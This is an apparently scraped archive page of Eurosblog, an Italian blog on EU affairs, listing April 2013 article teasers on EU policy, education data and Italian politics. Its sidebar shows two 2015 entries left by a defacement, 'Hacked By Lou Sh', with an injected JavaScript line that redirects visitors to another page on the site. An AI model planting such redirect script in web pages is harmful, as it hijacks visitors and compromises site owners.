EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aprile 2013
it

Il prossimo 5 aprile si svolgerà a Pisa la quarta tappa dell'Anno europeo dei cittadini e sarà l'occasione per discutere di quanto più importante per la nostra esistenza: ambiente, aria, acqua, rifiuti, suolo e consumo sostenibile.

La popolazione mondiale aumenta costantemente mentre le risorse naturali come l’acqua, l’aria, un ambiente sano e vivibile sono sempre più scarse. È un problema che riguarda da vicino il continente europeo, e l’Unione europea ha da tempo elaborato una strategia integrata per l’uso efficiente delle (...)

it

Zaryn Denzel, fondatore di Tuenti, il più grande social network spagnolo; Daniel Ek e Martin Lorentzon, fondatori di Spotify; Niklas Zennström, co-fondatore di Skype.

Questi sono solo alcuni dei nomi di giovani imprenditori del settore tecnologico che hanno fatto nascere e crescere in Europa la loro attività, per poi espanderla a livello globale. Spotify, il servizio di musica streaming online, è oggi in 23 paesi, mentre attraverso Skype passa un terzo delle (...)

it

Il neuroscienziato israeliano Henry Markram ha annunciato che, grazie alla costruzione del primo cervello digitale al mondo, verranno acquisite molte nuove informazioni sui disturbi mentali.

Il neuroscienziato israeliano Henry Markram, che dal maggio 2005 lavora insieme all’IBM ad un progetto chiamato Blue Brain, ha annunciato che, grazie alla costruzione del primo cervello digitale al mondo, verranno acquisite molte nuove informazioni sui disturbi mentali. Il progetto mira a (...)

it

Il problema di fondo è l'iter, che va modificato il prima possibile. Maroš Šefčovič, commissario europeo per l'amministrazione e le relazioni interistituzionali, ha ricevuto una corposa proposta consegnatagli dai comitati organizzativi di ben cinque iniziative europee. Come detto, la prima cosa da fare è modificare l'iter, ma non solo. Serve un'innovazione che possa rendere partecipi più persone possibili, con l'aiuto della pubblicità che potrà rendere il tutto più noto.

Nell’ultimo anno le iniziative proposte sono state ben ventisette, ma nessuna è andata a buon fine. Analizzando nello specifico la situazione, ci si accorge che addirittura otto sono state respinte a priori a causa delle legislazioni nazionali che non permettevano già a monte una buona riuscita. (...)

it

Stando a uno studio condotto dalla rete Eurydice per conto della Commissione europea, a partire dal 2010 l’investimento pubblico nel settore dell’istruzione si è ridotto in 8 dei 25 Stati membri esaminati. Emblematica la situazione dell’Italia che nel 2012 ha fatto registrare un calo del bilancio superiore al 5%; diminuzione che va a sommarsi ai tagli tra l’1 e il 5% già registrati nell’anno 2011.

“Sono tempi difficili per le finanze nazionali ma abbiamo bisogno di un approccio coerente in tema di investimenti pubblici nell’istruzione e nella formazione poiché questa è la chiave per il futuro dei nostri giovani e per la ripresa di un’economia sostenibile nel lungo periodo. Se gli Stati membri (...)

it

Il progetto RARE-Bestpractices ha l’obiettivo di approfondire gli studi e trovare una cura alle malattie rare attraverso una serie di esperimenti ed esempi pratici.

La volontà è quella di creare delle procedure standard affidabili, capaci di marcare le linee guida alle quali si dovranno attenere i futuri ricercatori . Il RARE-Bestpractices vuole dunque affinare la ricerca, senza però ampliare il grande distacco che già sussiste tra laboratorio e pratica negli (...)

it

Su raccomandazione del Commissario per l’ambiente Ue Janez Potočnik, la Commissione Europea deferirà l’Italia alla Corte di Giustizia Ue per non aver rispettato le prescrizioni della legislazione europea in materia di rifiuti.

A causa di un’interpretazione restrittiva da parte delle Autorità Italiane per quanto riguarda il concetto di "sufficiente trattamento dei rifiuti", non solo la discarica di Malagrotta a Roma, ma anche altre discariche nella regione Lazio, sono state riempite di rifiuti che non hanno subito gli (...)

it

In seguito alla globalizzazione è aumentata per le aziende l'importanza della comunicazione in lingue differenti dalla propria. L'industria della traduzione è quindi un segmento in continua espansione che nel tempo ha determinato la nascita di vere e proprie società o agenzie di traduzione, che offrono gli strumenti necessari per poter operare in maniera competitiva nel contesto internazionale, garantendo una presenza efficace sul mercato globale. Così l'EUATC - European Union of Associations of Translation Companies - ha cominciato ad imporsi sul panorama europeo giocando un ruolo chiave in una serie di iniziative europee.

EUATC è l’organizzazione che coordina le associazioni nazionali delle imprese di traduzione in tutta Europa. Essa lavora e collabora in un’ottica aperta e condivisa, capace di far fronte alle nuove tendenze del settore attraverso uno sguardo attento ai mercati di tutto il mondo. Attraverso l’uso (...)

it

In questo inizio di primavera l'Europa si mette in moto per garantire e potenziare l'afflusso turistico verso i suoi territori.

L’azione concreta attraverso cui si darà il via a questo progetto, proviene dalla task force del Parlamento europeo sul Turismo, capitanata dal coordinatore Carlo Fidanza. Il parlamentare del PPE ha infatti reso noto l’inserimento in una carta ufficiale, di un’idea che veniva già sollecitata da (...)

it

Di tutti i ricercatori europei, le persone di sesso femminile rappresentano soltanto il 33%, cioè soltanto uno su tre. Questa percentuale in realtà è in aumento, il che rende ancora meglio l'idea dell'arretratezza del nostro continente rispetto agli altri. La cifre si abbassano ancora di più se si osservano i dati riguardanti il numero di professoresse impiegate ordinariamente (20% rispetto agli uomini) e di donne che gestiscono le istituzioni nell'ambito dell'istruzione superiore, soltanto il 15,5%. E' chiaro che dati come questi non possono che far preoccupare: il sessismo in ambito lavorativo sembra ancora essere presente e ricompare prepotentemente dinanzi a notizie come questa.

Máire Geoghegan-Quinn La Commissaria Geoghegan-Quinn durante un congresso La Commissaria europea per la ricerca, la scienza e l’innovazione, Máire Geoghegan-Quinn, ha espresso il proprio dissenso verso questi risultati: "Nonostante alcuni progressi negli ultimi anni, le donne nel campo della (...)

it

Migliorare la situazione lavorativa, prevenendo abusi, maltrattamenti e lavoro minorile: è questo lo scopo che la Commissione europea intende raggiungere, con la sua azione, al fine di permettere gli Stati membri di attuare la convenzione dell’Organizzazione Internazionale del Lavoro.

L’Unione Europea è costantemente impegnata al fine di garantire ai propri cittadini gli stessi diritti ma anche le stesse condizioni di vita. In questo caso l’istituzione europea ha agito in materia di occupazione e lavoro: alla fine di marzo, la Commissione europea ha presentato una proposta di (...)

it

A breve distanza dal via libera dato dal Dipartimento di Giustizia americano anche la Commissione europea ha finalmente dato un parere positivo riguardo alla creazione della Penguin Random House, il nuovo gigante dell'editoria anglosassone che fonderà insieme il gruppo britannico Pearson e quello tedesco Bertelsmann.

Secondo la Commissione l’accordo non creerà problemi di concorrenza poiché il futuro colosso dovrà fronteggiare comunque altri grandi rivali, come il gruppo Murdoch. La ragione ufficiale di questo accordo si trovava infatti nella volontà di unire le forze per non farsi la guerra nel mercato (...)

it

La Commissione per il lavoro e gli affari sociali (Empl) del Parlamento Europeo che si occupa dei due settori del lavoro e degli affari sociali sta elaborando un progetto (che però non sarà di natura legislativa) che si focalizza sul problema delle pensioni. Questo prospetto sarà votato nel prossimo mese di maggio dall’aula di Strasburgo. Il messaggio forte che si vuole marcare in questa circostanza è quello di far sì che anche per i pensionati ci sia la possibilità di vivere una vita accettabile e adeguata senza dover ogni volta arrivare a stento alla fine del mese.

Ciò che si prefigge la Commissione Empl è di raggiungere l’obiettivo nel più breve tempo possibile. Quando il testo è stato presentato da Ria Oomen-Ruijten, membro del Partito popolare europeo, ha ottenuto 32 voti favorevoli, 6 astensioni e 4 voti contrari. Il rapporto messo a rischio è quello tra (...)

it

Facilitare la libera circolazione di idee, favorire lo scambio interculturale: questo è la volontà dell'UE, rendere il Vecchio continente parte del mondo, libero dalle costrizioni burocratiche.

La proposta è stata avanzata dalla commissaria europea Cecilia Malmström, la quale il 25 marzo scorso, accompagnata dai ricercatori ospiti dell’UE, Fatma Abdi e Bellarminus Kakpovi, ha esposto i vantaggi di una apertura di mentalità da parte dei paesi dell’UE. Un’apertura che deve riguardare in (...)

it

Dopo la Slovenia, membro dal 2004, la Croazia sarà il secondo dei sei Paesi ex jugoslavi a diventare membro dell’Ue.

Durante il fine settimana appena trascorso i cittadini croati sono stati chiamati alle urne per eleggere i loro dodici rappresentanti al parlamento europeo. Questo ad esattamente due mesi e mezzo dall’ingresso del Paese ex jugoslavo nell’Unione europea, il primo luglio prossimo (la Croazia (...)

it

Di recente la Commissione Europea ha diretto uno studio che prende in considerazione la situazione dei minori figli di migranti che subiscono il rischio di essere segregati a livello scolastico e trovarsi in scuole che offrono loro poche risorse. Questo porta a far sì che i ragazzi abbandonino prima del tempo la scuola o che abbiano un rendimento scolastico insufficiente. Su quest’ultimo punto si focalizza il lavoro svolto dalla Commissione Europea che intende fornire un aiuto educativo anche a livello di integrazione per permettere anche ai ragazzi stranieri di integrarsi in società.

Il lavoro ha analizzato ben 15 paesi per esaminare il loro flusso migratorio e capire se i vari Stati membri dell’Unione contribuiscano o meno nel fornire un sostegno valido ai minori. Gli Stati oggetto di studio sono Austria, Belgio (comunità fiamminga), Cipro, Danimarca, Francia, Germania, (...)

it

Lo scorso 9 aprile si è tenuto a Bruxelles l'incontro “L'Europa per la Città della Scienza – idee, proposte e strategie per la ricostruzione”.

L’evento fortemente voluto dai Vicepresidenti del Parlamento europeo Roberta Angelilli e Gianni Pittella, è stato presieduto anche dal Vicepresidente della Commissione Ue Antonio Tajani, da Maire Geoghegan Quinn, commissario per la Ricerca e da Johannes Hahn, commissario per le Politiche (...)

it

Italy finally has a new president. Oh, well, an old president for that matter. After five rounds of fruitless votes and useless negotiations, 88 year old Giorgio Napolitano had to come to terms with the fact that the parties in Parliament would never be able to put together the needed 504 votes for his successor. Helpless party leaders begged him to stand for a new election. Very reluctantly, he did so; he had no other choice, as a lame-duck president has very reduced powers in Italy and notably cannot dismiss Parliament when no agreement is found over the formation of a new government.

If it wasn’t for the terrible conditions of the country, it would be excellent material for an operetta. When the leader of the People of Freedom Party (PdL), Silvio Berlusconi, resigned in November 2011, the Democratic Party (PD) was looking forward to a landslide victory. Instead, not only (...)

it

Il mese di aprile in Europa inizia all'insegna della statistica e dei dati. L'Eurostat ha infatti pubblicato i dati raccolti in materia di istruzione e abbandono scolastico relativi all'anno 2012. Dall'indagine è emerso che l’UE e i suoi Stati membri si sono mossi nella giusta direzione e hanno compiuto decisivi passi in avanti in quest’ambito. Sempre più persone completano l’istruzione superiore e l’abbandono scolastico è in calo. Unica nota negativa i dati sul sesso forte: i maschi restano indietro.

L’11 aprile 2013, l’Eurostat, l’ufficio statistico dell’Unione europea, ha diffuso i dati relativi all’anno 2012 riguardanti i risultati ottenuti dai diversi Stati membri al fine di raggiungere gli obiettivi della strategia “Europa 2020” nel campo dell’istruzione. L’impegno dei Paesi dell’UE si è reso (...)

26
04
2013

The road to Rome...

it

Letta, who will be turning 47 in August, was defined by Napolitano “a young person of great experience”. Indeed, Letta is a talented person who also had the luck to be the right person, in the right place, at the right moment several times. He also has an influential aunt, Silvio Berlusconi’s closest advisor Gianni Letta; though at opposite poles in politics, Letta Sr has always been a source of wise advice for the younger Letta.

A young assistant to the late leading left Christian Democrat intellectual and politicians Beniamino Andreatta, Letta was named Minister of EU affairs in 1998, when his mentor was kept out of government for a question of reciprocal vetoes within his own party. Despite being very young, Letta (...)

it

Dal 2006 ad oggi il numero dei computer a disposizione delle scuole è aumentato notevolmente: ciò permette da una parte di offrire ad esse la possibilità di collegarsi ma dall’altra avviene una fruizione molto irregolare di questi dispositivi.

Secondo lo studio pubblicato dalla Commissione Europea, nelle scuole dell’Ue gli insegnanti hanno bisogno di un valido supporto e delle competenze necessarie per poter affrontare ed essere all’altezza delle nuove tecnologie. I risultati parlano chiaro: in nove anni di studi solamente un ragazzo (...)

it

Ancora una volta l'Italia dimostra di non reggere il passo con gli altri paesi europei, i dati Eurostat parlano chiaro: solo il 21% di italiani iscritti all'università si laurea entro i 34 anni; il 26% delle donne e il 17% degli uomini. I dati ci rilegano in fondo alla classifica, superati anche dalla Romania, ex maglia nera nel 2010, oggi con il 21,8%.

Sono questi i dati che ci rilegano in fondo alla classifica, superati anche dalla Romania, ex maglia nera nel 2010, oggi con il 21,8%. L’ Italia nettamente fuori media UE, non è altro che l’esito preoccupante di un paese in cui le cose sono andate sempre peggiorando, non riuscendo mai a volgere (...)

it

Mission Impossible One: accomplished! After a 2-months stall, in only 2 days Enrico Letta presented Italy with its best government ever. Letta, who will be turning 47 in August, was defined by President Giorgio Napolitano as “a young person of great experience”.

The former Christian Democrat began his career as a very young assistant to the late leading economist and politician Beniamino Andreatta, to then become Italy’s youngest Minister in 1998, when he was put in charge of European affairs. Letta managed to transform the then “Cinderella” EU Ministry (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France